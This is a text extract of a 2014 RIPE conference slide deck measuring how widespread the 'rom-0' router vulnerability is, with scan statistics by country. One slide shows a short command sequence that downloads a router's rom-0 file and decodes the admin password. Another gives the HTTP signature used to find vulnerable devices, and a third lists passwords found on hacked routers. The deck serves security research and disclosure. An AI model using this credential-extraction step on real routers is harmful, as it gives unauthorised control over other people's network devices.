15
Impact of "rom-0" vulnerability Tomáš Hlaváček [email protected] RIPE69 AA-WG 5. 11. 2014

Impact of "rom-0" vulnerability

  • Upload
    vulien

  • View
    219

  • Download
    3

Embed Size (px)

Citation preview

Page 1: Impact of "rom-0" vulnerability

Impact of "rom-0" vulnerability

Tomáš Hlaváček • [email protected] • RIPE69 AA-WG • 5. 11. 2014

Page 2: Impact of "rom-0" vulnerability

“rom-0” vulnerability

$ wget http://192.168.1.1/rom­0

Connecting to 192.168.1.1:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 16384 (16K) [application/octet­stream]

2014­05­20 16:58:18 (138 KB/s) ­ ‘rom­0’ saved [16384/16384]

$ ./RomDecoder rom­0 

password: SuperSecretPassword

Page 3: Impact of "rom-0" vulnerability

Which one is vulnerable ?

Page 4: Impact of "rom-0" vulnerability

Which one is vulnerable ?

● Web based test

● http://rom-0.cz

● Scan of the Internet: HTTP HEAD /rom-0

● Recognition:

● Status code: 200● Content-length: 16384

Page 5: Impact of "rom-0" vulnerability

Results (May 2014)

● First scan: May 17-18 2014

● ~71M HTTP servers tested

● 1 219 985 vulnerable

● Czech Republic: 5 368

● Top in EU: Italy (116 731), Poland (22 702)

● Top in the world: Thailand (167 505), Columbia (139 976)

Page 6: Impact of "rom-0" vulnerability
Page 7: Impact of "rom-0" vulnerability
Page 8: Impact of "rom-0" vulnerability

Analysis

● How many are really vulnerable: Over 90%

● Already hacked: At least 30% (but likely all of them)

● Most common passwords:

● PortablePwned● ][p}{P][p---● .corporacion● 263297

Page 9: Impact of "rom-0" vulnerability

World map (05-10/2014)

Page 10: Impact of "rom-0" vulnerability

Thailand (no. 1; 100% = 167505)

Page 11: Impact of "rom-0" vulnerability

Colombia (no. 2; 100% = 139976)

Page 12: Impact of "rom-0" vulnerability

Italy (no. 3; 100% = 116731)

Page 13: Impact of "rom-0" vulnerability

Czech Republic (100% = 5368)

Page 14: Impact of "rom-0" vulnerability

Thank You

Tomáš Hlaváček • [email protected]

Page 15: Impact of "rom-0" vulnerability

Raw data & graphs

http://report.rom-0.cz/